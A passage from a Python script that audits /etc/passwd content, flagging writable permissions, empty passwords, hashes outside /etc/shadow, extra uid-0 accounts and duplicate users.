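        findings.append((0, "WRITABLE", f"mode {oct(mode)} lets non-root users edit the file"))
    seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "MALFORMED", line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            # empty field: su/login accept the account without any password
            findings.append((lineno, "EMPTY_PASSWORD", f"{name} can log in without a password"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # anything else is a hash readable by every local user
            findings.append((lineno, "HASH_IN_PASSWD", f"{name} has a crackable hash outside /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((lineno, "UID0_NOT_ROOT", f"{name} has uid 0"))
        if name in seen:
            findings.append((lineno, "DUPLICATE_USER", f"{name} also defined on line {seen[name]}"))
        else:
            seen[name] = lineno
    return findings


if __name__ == "__main__":
    # On a live host: audit_passwd(open("/etc/passwd").read(), os.stat("/etc/passwd").st_mode & 0o777)
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Run against a real host by passing the file content and `st_mode & 0o777`; the expected state is mode 644, every second field `x`, `*` or `!`-locked, and exactly one uid 0 entry named root.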